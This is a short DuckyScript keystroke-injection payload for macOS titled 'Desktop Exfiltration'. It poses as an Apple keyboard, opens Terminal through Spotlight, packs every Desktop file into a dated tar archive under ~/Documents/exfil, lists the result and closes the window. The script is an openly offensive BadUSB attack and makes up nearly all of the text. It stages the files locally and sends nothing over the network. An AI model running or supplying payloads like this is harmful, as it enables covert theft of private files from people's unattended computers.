REM Author: Generated
REM Title: Desktop Exfiltration
REM Target: macOS
REM Version: 1.0
REM Category: Exfiltration
REM ---
DELAY 1000
REM Compress and prepare Desktop for exfiltration
REM Creates archive in ~/Documents/exfil/
REM ID 05ac:021e Apple:Keyboard
DELAY 1000
GUI SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 1000
STRING mkdir -p ~/Documents/exfil
ENTER
DELAY 500
STRING cd ~/Documents/exfil && tar -czf desktop_backup_$(date +%Y%m%d).tar.gz ~/Desktop/* 2>/dev/null || echo 'Empty desktop' > desktop_backup_$(date +%Y%m%d).txt
ENTER
DELAY 3000
STRING ls -lah ~/Documents/exfil/
ENTER
DELAY 500
GUI w
